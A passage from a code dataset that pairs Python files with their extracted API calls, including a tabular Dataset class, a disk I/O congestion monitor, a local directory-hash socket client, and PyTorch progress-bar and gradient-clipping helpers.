((36347, 36364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\\n', (36355, 36364), True, 'import numpy as np\\n'), ((36380, 36398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (36388, 36398), True, 'import numpy as np\\n'), ((36420, 36444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\\n', (36428, 36444), True, 'import numpy as np\\n'), ((36470, 36498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\\n', (36478, 36498), True, 'import numpy as np\\n'), ((37347, 37364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\\n', (37355, 37364), True, 'import numpy as np\\n'), ((37380, 37398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (37388, 37398), True, 'import numpy as np\\n'), ((37420, 37444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\\n', (37428, 37444), True, 'import numpy as np\\n'), ((37470, 37498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\\n', (37478, 37498), True, 'import numpy as np\\n'), ((38347, 38364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\\n', (38355, 38364), True, 'import numpy as np\\n'), ((38380, 38398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (38388, 38398), True, 'import numpy as np\\n'), ((38420, 38444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\\n', (38428, 38444), True, 'import numpy as np\\n'), ((38470, 38498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\\n', (38478, 38498), True, 'import numpy as np\\n'), ((5641, 5660), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (5648, 5660), True, 'import numpy as np\\n'), ((6090, 6129), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\\n', (6104, 6129), True, 'import numpy as np\\n'), ((6130, 6152), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\\n', (6140, 6152), True, 'import numpy as np\\n'), ((13731, 13750), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (13738, 13750), True, 'import numpy as np\\n'), ((14180, 14219), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\\n', (14194, 14219), True, 'import numpy as np\\n'), ((14220, 14242), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\\n', (14230, 14242), True, 'import numpy as np\\n'), ((21821, 21840), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (21828, 21840), True, 'import numpy as np\\n'), ((22270, 22309), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\\n', (22284, 22309), True, 'import numpy as np\\n'), ((22310, 22332), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\\n', (22320, 22332), True, 'import numpy as np\\n'), ((29911, 29930), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (29918, 29930), True, 'import numpy as np\\n'), ((30360, 30399), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\\n', (30374, 30399), True, 'import numpy as np\\n'), ((30400, 30422), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\\n', (30410, 30422), True, 'import numpy as np\\n'), ((635, 650), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (643, 650), True, 'import numpy as np\\n'), ((1064, 1089), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (1072, 1089), True, 'import numpy as np\\n'), ((5975, 6000), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (5983, 6000), True, 'import numpy as np\\n'), ((8485, 8516), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\\n', (8495, 8516), True, 'import numpy as np\\n'), ((8553, 8584), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\\n', (8563, 8584), True, 'import numpy as np\\n'), ((8621, 8652), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\\n', (8631, 8652), True, 'import numpy as np\\n'), ((8809, 8847), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\\n', (8819, 8847), True, 'import numpy as np\\n'), ((8926, 8964), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\\n', (8936, 8964), True, 'import numpy as np\\n'), ((9043, 9081), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\\n', (9053, 9081), True, 'import numpy as np\\n'), ((9154, 9179), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (9162, 9179), True, 'import numpy as np\\n'), ((14065, 14090), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (14073, 14090), True, 'import numpy as np\\n'), ((16575, 16606), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\\n', (16585, 16606), True, 'import numpy as np\\n'), ((16643, 16674), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\\n', (16653, 16674), True, 'import numpy as np\\n'), ((16711, 16742), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\\n', (16721, 16742), True, 'import numpy as np\\n'), ((16899, 16937), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\\n', (16909, 16937), True, 'import numpy as np\\n'), ((17016, 17054), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\\n', (17026, 17054), True, 'import numpy as np\\n'), ((17133, 17171), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\\n', (17143, 17171), True, 'import numpy as np\\n'), ((17244, 17269), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (17252, 17269), True, 'import numpy as np\\n'), ((22155, 22180), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (22163, 22180), True, 'import numpy as np\\n'), ((24665, 24696), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\\n', (24675, 24696), True, 'import numpy as np\\n'), ((24733, 24764), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\\n', (24743, 24764), True, 'import numpy as np\\n'), ((24801, 24832), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\\n', (24811, 24832), True, 'import numpy as np\\n'), ((24989, 25027), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\\n', (24999, 25027), True, 'import numpy as np\\n'), ((25106, 25144), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\\n', (25116, 25144), True, 'import numpy as np\\n'), ((25223, 25261), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\\n', (25233, 25261), True, 'import numpy as np\\n'), ((25334, 25359), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (25342, 25359), True, 'import numpy as np\\n'), ((30245, 30270), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (30253, 30270), True, 'import numpy as np\\n'), ((32755, 32786), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\\n', (32765, 32786), True, 'import numpy as np\\n'), ((32823, 32854), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\\n', (32833, 32854), True, 'import numpy as np\\n'), ((32891, 32922), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\\n', (32901, 32922), True, 'import numpy as np\\n'), ((33079, 33117), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\\n', (33089, 33117), True, 'import numpy as np\\n'), ((33196, 33234), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\\n', (33206, 33234), True, 'import numpy as np\\n'), ((33313, 33351), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\\n', (33323, 33351), True, 'import numpy as np\\n'), ((33424, 33449), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (33432, 33449), True, 'import numpy as np\\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (1117, 1134), True, 'import numpy as np\\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (9207, 9224), True, 'import numpy as np\\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (17297, 17314), True, 'import numpy as np\\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (25387, 25404), True, 'import numpy as np\\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (33477, 33494), True, 'import numpy as np\\n')]"}}},{"rowIdx":740,"cells":{"code":{"kind":"string","value":"import pandas as pd\nimport numpy as np\nfrom src.si.util.util import label_gen\n\n__all__ = ['Dataset']\n\nclass Dataset:\n def __init__(self, X=None, Y=None,\n xnames: list = None,\n yname: str = None):\n \"\"\" Tabular Dataset\"\"\"\n if X is None:\n raise Exception(\"Trying to instanciate a DataSet without any data\")\n self.X = X\n self.Y = Y\n self.xnames = xnames if xnames else label_gen(X.shape[1])\n self.yname = yname if yname else 'Y'\n\n @classmethod\n def from_data(cls, filename, sep=\",\", labeled=True):\n \"\"\"Creates a DataSet from a data file.\n\n :param filename: The filename\n :type filename: str\n :param sep: attributes separator, defaults to \",\"\n :type sep: str, optional\n :return: A DataSet object\n :rtype: DataSet\n \"\"\"\n data = np.genfromtxt(filename, delimiter=sep)\n if labeled:\n X = data[:, 0:-1]\n Y = data[:, -1]\n else:\n X = data\n Y = None\n return cls(X, Y)\n\n @classmethod\n def from_dataframe(cls, df, ylabel=None):\n \"\"\"Creates a DataSet from a pandas dataframe.\n :param df: [description]\n :type df: [type]\n :param ylabel: [description], defaults to None\n :type ylabel: [type], optional\n :return: [description]\n :rtype: [type]\n \"\"\"\n\n if ylabel and ylabel in df.columns:\n X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy\n Y = df.loc[:, ylabel].to_numpy()\n # xnames = df.columns.tolist().remove(ylabel)\n yname = ylabel\n xnames = df.columns.tolist()\n for name in xnames:\n if name == yname:\n xnames.remove(yname)\n\n else:\n X = df.to_numpy()\n Y = None\n xnames = df.columns.tolist()\n yname = None\n\n return cls(X, Y, xnames, yname)\n\n\n def __len__(self):\n \"\"\"Returns the number of data points.\"\"\"\n return self.X.shape[0]\n\n def hasLabel(self):\n \"\"\"Returns True if the dataset constains labels (a dependent variable)\"\"\"\n return self.Y is not None\n\n def getNumFeatures(self):\n \"\"\"Returns the number of features\"\"\"\n return self.X.shape[1]\n\n def getNumClasses(self):\n \"\"\"Returns the number of label classes or 0 if the dataset has no dependent variable.\"\"\"\n return len(np.unique(self.Y)) if self.hasLabel() else 0\n\n def writeDataset(self, filename, sep=\",\"):\n \"\"\"Saves the dataset to a file\n\n :param filename: The output file path\n :type filename: str\n :param sep: The fields separator, defaults to \",\"\n :type sep: str, optional\n \"\"\"\n\n fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))\n np.savetxt(filename, fullds, delimiter=sep)\n\n def toDataframe(self):\n \"\"\" Converts the dataset into a pandas DataFrame\"\"\"\n if self.hasLabel():\n df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))\n else:\n df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])\n return df\n\n def getXy(self):\n return self.X, self.Y\n\n\ndef summary(dataset, format='df'):\n \"\"\" Returns the statistics of a dataset(mean, std, max, min)\n\n :param dataset: A Dataset object\n :type dataset: si.data.Dataset\n :param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'\n :type format: str, optional\n \"\"\"\n if format not in [\"df\", \"dict\"]:\n raise Exception(\"Invalid format. Choose between 'df' and 'dict'.\")\n if dataset.hasLabel():\n data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))\n #data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])\n columns = dataset.xnames[:] + [dataset.yname]\n else:\n data = dataset.X\n columns = dataset.xnames[:]\n stats = {}\n if type(dataset.Y[0]) is str:\n for i in range(data.shape[1]-1): #ve colunas\n _means = np.mean(data[:, i], axis=0)\n _vars = np.var(data[:, i], axis=0)\n _maxs = np.max(data[:, i], axis=0)\n _mins = np.min(data[:, i], axis=0)\n\n stat = {\"mean\": _means,\n \"var\": _vars,\n \"max\": _maxs,\n \"min\": _mins\n }\n stats[columns[i]] = stat\n else:\n for i in range(data.shape[1]): # ve colunas\n _means = np.mean(data[:, i], axis=0)\n _vars = np.var(data[:, i], axis=0)\n _maxs = np.max(data[:, i], axis=0)\n _mins = np.min(data[:, i], axis=0)\n\n stat = {\"mean\": _means,\n \"var\": _vars,\n \"max\": _maxs,\n \"min\": _mins\n }\n stats[columns[i]] = stat\n # _means = np.mean(data, axis=0)\n # _vars = np.var(data, axis=0)\n # _maxs = np.max(data, axis=0)\n # _mins = np.min(data, axis=0)\n # stats = {}\n # for i in range(data.shape[1]):\n # stat = {\"mean\": _means[i],\n # \"var\": _vars[i],\n # \"max\": _maxs[i],\n # \"min\": _mins[i]\n # }\n # stats[columns[i]] = stat\n\n if format == \"dict\":\n return stats\n else:\n return pd.DataFrame(stats)\n"},"apis":{"kind":"list like","value":["src.si.util.util.label_gen","numpy.mean","numpy.unique","numpy.max","numpy.savetxt","numpy.min","pandas.DataFrame","numpy.genfromtxt","numpy.var"],"string":"[\n \"src.si.util.util.label_gen\",\n \"numpy.mean\",\n \"numpy.unique\",\n \"numpy.max\",\n \"numpy.savetxt\",\n \"numpy.min\",\n \"pandas.DataFrame\",\n \"numpy.genfromtxt\",\n \"numpy.var\"\n]"},"extract_api":{"kind":"string","value":"[((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\\n', (891, 916), True, 'import numpy as np\\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, delimiter=sep)\\n', (2895, 2928), True, 'import numpy as np\\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\\n', (5494, 5501), True, 'import pandas as pd\\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\\n', (455, 467), False, 'from src.si.util.util import label_gen\\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4209, 4229), True, 'import numpy as np\\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4256, 4276), True, 'import numpy as np\\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4303, 4323), True, 'import numpy as np\\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4350, 4370), True, 'import numpy as np\\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4659, 4679), True, 'import numpy as np\\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4706, 4726), True, 'import numpy as np\\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4753, 4773), True, 'import numpy as np\\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4800, 4820), True, 'import numpy as np\\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\\n', (2506, 2514), True, 'import numpy as np\\n')]"}}},{"rowIdx":741,"cells":{"code":{"kind":"string","value":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright (c) 2016 Wind River Systems, Inc.\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport logging\nimport os\n\nfrom io_monitor.constants import DOMAIN\nfrom io_monitor.utils.data_window import DataCollectionWindow\n\nLOG = logging.getLogger(DOMAIN)\n\n\nclass DeviceDataCollector(object):\n # Moving average windows\n MA_WINDOW_SMA = 0\n MA_WINDOW_MED = 1\n MA_WINDOW_LAR = 2\n\n # Device status\n STATUS_NORMAL = \"N\"\n STATUS_BUILDING = \"B\"\n STATUS_CONGESTED = \"L\"\n\n # Data tracked\n DATA_IOPS = \"iops\"\n DATA_AWAIT = \"await\"\n\n def __init__(self, device_node, data_elements,\n size_sma, size_med, size_lar):\n\n self.node = device_node\n\n if os.path.exists('/sys/block/' + self.node + '/dm/name'):\n self.name = open('/sys/block/' + self.node + '/dm/name',\n 'r').read().rstrip()\n else:\n self.name = self.node\n\n self.data_dict = {}\n self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}\n self.timestamp = None\n\n self.congestion_status = self.STATUS_NORMAL\n self.congestion_await_minimal_spike = -1\n self.congestion_await_sustained = -1\n\n for element in data_elements:\n self.data_dict.update({element: [\n DataCollectionWindow(size_sma, stuck_data_override=True),\n DataCollectionWindow(size_med, stuck_data_override=True),\n DataCollectionWindow(size_lar, stuck_data_override=True)]})\n\n def update_congestion_status(self):\n # Bail if threshold is not set\n if self.congestion_await_sustained == -1:\n return\n\n ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)\n ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)\n ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)\n\n # Set the congestion status based on await moving average\n if self.congestion_status is self.STATUS_NORMAL:\n if ma_sma > self.congestion_await_sustained:\n self.congestion_status = self.STATUS_BUILDING\n\n if self.congestion_status is self.STATUS_BUILDING:\n if ma_lar > self.congestion_await_sustained:\n self.congestion_status = self.STATUS_CONGESTED\n LOG.warn(\"Node %s (%s) is experiencing high await times.\"\n % (self.node, self.name))\n elif ma_sma < self.congestion_await_sustained:\n self.congestion_status = self.STATUS_NORMAL\n\n if self.congestion_status is self.STATUS_CONGESTED:\n if ma_med < self.congestion_await_sustained:\n self.congestion_status = self.STATUS_BUILDING\n\n def update_data(self, ts, element, value):\n self.timestamp = ts\n\n # LOG.debug(\"%s: e = %s, v= %f\" % (self.node, element, value))\n for w in [self.MA_WINDOW_SMA,\n self.MA_WINDOW_MED,\n self.MA_WINDOW_LAR]:\n self.data_dict[element][w].update(value, self.data_caps[element])\n\n def get_latest(self, element):\n if element not in self.data_dict:\n LOG.error(\"Error: invalid element requested = %s\" % element)\n return 0\n\n return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()\n\n def get_average(self, element, window):\n if window not in [self.MA_WINDOW_SMA,\n self.MA_WINDOW_MED,\n self.MA_WINDOW_LAR]:\n LOG.error(\"WindowError: invalid window requested = %s\" % window)\n return 0\n\n if element not in self.data_dict:\n LOG.error(\"Error: invalid element requested = %s\" % element)\n return 0\n\n return self.data_dict[element][window].get_average()\n\n def is_data_stale(self, ts):\n return not (ts == self.timestamp)\n\n def get_congestion_status(self, debug=False):\n\n if debug:\n ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)\n ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)\n ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)\n\n LOG.debug(\"%s [ %6.2f %6.2f %6.2f ] %d\" %\n (self.node, ma_sma, ma_med, ma_lar,\n self.congestion_await_sustained))\n\n return self.congestion_status\n\n def set_data_caps(self, element, cap):\n if element in self.data_caps:\n self.data_caps[element] = cap\n\n def set_congestion_thresholds(self, await_minimal_spike,\n await_sustained_congestion):\n self.congestion_await_minimal_spike = await_minimal_spike\n self.congestion_await_sustained = await_sustained_congestion\n\n def get_element_windows_avg_list(self, element):\n return [self.get_average(element, self.MA_WINDOW_SMA),\n self.get_average(element, self.MA_WINDOW_MED),\n self.get_average(element, self.MA_WINDOW_LAR)]\n\n def get_element_windows_avg_string(self, element):\n return \"%s [ %9.2f, %9.2f, %9.2f ]\" % (\n element,\n self.get_average(element, self.MA_WINDOW_SMA),\n self.get_average(element, self.MA_WINDOW_MED),\n self.get_average(element, self.MA_WINDOW_LAR))\n"},"apis":{"kind":"list like","value":["logging.getLogger","os.path.exists","io_monitor.utils.data_window.DataCollectionWindow"],"string":"[\n \"logging.getLogger\",\n \"os.path.exists\",\n \"io_monitor.utils.data_window.DataCollectionWindow\"\n]"},"extract_api":{"kind":"string","value":"[((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\\n', (287, 295), False, 'import logging\\n'), ((739, 793), 'os.path.exists', 'os.path.exists', ([\"('/sys/block/' + self.node + '/dm/name')\"], {}), \"('/sys/block/' + self.node + '/dm/name')\\n\", (753, 793), False, 'import os\\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n')]"}}},{"rowIdx":742,"cells":{"code":{"kind":"string","value":"from net_common import *\nimport struct\nimport sys\n\ndef getDirHashOpts(withNames=False,\n ignoreThumbsFiles=True,\n ignoreUnixHiddenFiles=True,\n ignoreEmptyDirs=True):\n return bytearray([((1 if withNames else 0) +\n (2 if ignoreThumbsFiles else 0) +\n (4 if ignoreUnixHiddenFiles else 0) +\n (8 if ignoreEmptyDirs else 0))])\n\nif __name__ == \"__main__\":\n sock = get_connected_local_socket()\n\n path = encodeString('/dev/shm/exampleDir')\n # path = encodeString('/dev/null')\n sock.sendall(bytearray(b'\\x0A')) # HASH request\n # sock.sendall(bytearray(b'\\x01')) # choose MD5 algorithm\n sock.sendall(bytearray(b'\\x06')) # choose SHA3-224 algorithm\n sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)\n sock.sendall(struct.pack(\"@H\", len(path))) # len of path as unsigned short\n sock.sendall(path)\n\n resp = sock.recv(1) # response first byte: \\x00 OK or \\xFF ERROR\n\n if resp != b'\\x00':\n print(\"Error byte received, errno is:\", struct.unpack(\"@i\", sock.recv(4))[0])\n sys.exit(0)\n # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size\n print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size\n sock.close()\n"},"apis":{"kind":"list like","value":["sys.exit"],"string":"[\n \"sys.exit\"\n]"},"extract_api":{"kind":"string","value":"[((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\\n', (1209, 1212), False, 'import sys\\n')]"}}},{"rowIdx":743,"cells":{"code":{"kind":"string","value":"'''Some helper functions for PyTorch, including:\r\n - progress_bar: progress bar mimic xlua.progress.\r\n - set_lr : set the learning rate\r\n - clip_gradient : clip gradient\r\n'''\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.init as init\r\nfrom torch.autograd import Function\r\n\r\n#获取控制台行、列数\r\nif sys.platform == 'win32':\r\n\tterm_width = 80\r\nelse:\r\n\tprint('###', os.popen('stty size', 'r').read())\r\n\t_, term_width = os.popen('stty size', 'r').read().split()\r\n\tterm_width = int(term_width)\r\n\r\nTOTAL_BAR_LENGTH = 30.\r\nlast_time = time.time()\r\nbegin_time = last_time\r\n\r\n#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432) \r\ndef progress_bar(current, total, msg=None):\r\n global last_time, begin_time\r\n if current == 0:\r\n begin_time = time.time() # Reset for new bar.\r\n\r\n cur_len = int(TOTAL_BAR_LENGTH*current/total)\r\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\r\n\r\n sys.stdout.write(' [')\r\n for i in range(cur_len):\r\n sys.stdout.write('=')\r\n sys.stdout.write('>')\r\n for i in range(rest_len):\r\n sys.stdout.write('.')\r\n sys.stdout.write(']')\r\n\r\n cur_time = time.time()\r\n step_time = cur_time - last_time\r\n last_time = cur_time\r\n tot_time = cur_time - begin_time\r\n\r\n L = []\r\n if msg:\r\n L.append(' | ' + msg)\r\n\r\n msg = ''.join(L)\r\n sys.stdout.write(msg)\r\n for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\r\n sys.stdout.write(' ')\r\n\r\n # Go back to the center of the bar.\r\n for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\r\n sys.stdout.write('\\b')\r\n sys.stdout.write(' %d/%d ' % (current+1, total))\r\n\r\n if current < total-1:\r\n sys.stdout.write('\\r')\r\n else:\r\n sys.stdout.write('\\n')\r\n sys.stdout.flush()\r\n\r\ndef set_lr(optimizer, lr):\r\n for group in optimizer.param_groups:\r\n group['lr'] = lr\r\n\r\ndef clip_gradient(optimizer, grad_clip):\r\n for group in optimizer.param_groups:\r\n #print(group['params'])\r\n for param in group['params']:\r\n param.grad.data.clamp_(-grad_clip, grad_clip)\r\n"},"apis":{"kind":"list like","value":["sys.stdout.flush","os.popen","time.time","sys.stdout.write"],"string":"[\n \"sys.stdout.flush\",\n \"os.popen\",\n \"time.time\",\n \"sys.stdout.write\"\n]"},"extract_api":{"kind":"string","value":"[((587, 598), 'time.time', 'time.time', ([], {}), '()\\n', (596, 598), False, 'import time\\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\" [\"\"\"'], {}), \"(' [')\\n\", (987, 993), False, 'import sys\\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\">\"\"\"'], {}), \"('>')\\n\", (1076, 1081), False, 'import sys\\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"]\"\"\"'], {}), \"(']')\\n\", (1165, 1170), False, 'import sys\\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\\n', (1198, 1200), False, 'import time\\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\\n', (1406, 1411), False, 'import sys\\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', ([\"(' %d/%d ' % (current + 1, total))\"], {}), \"(' %d/%d ' % (current + 1, total))\\n\", (1664, 1698), False, 'import sys\\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\\n', (1822, 1824), False, 'import sys\\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\\n', (834, 836), False, 'import time\\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"=\"\"\"'], {}), \"('=')\\n\", (1049, 1054), False, 'import sys\\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\".\"\"\"'], {}), \"('.')\\n\", (1138, 1143), False, 'import sys\\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\" \"\"\"'], {}), \"(' ')\\n\", (1503, 1508), False, 'import sys\\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"\\x08\"\"\"'], {}), \"('\\\\x08')\\n\", (1636, 1644), 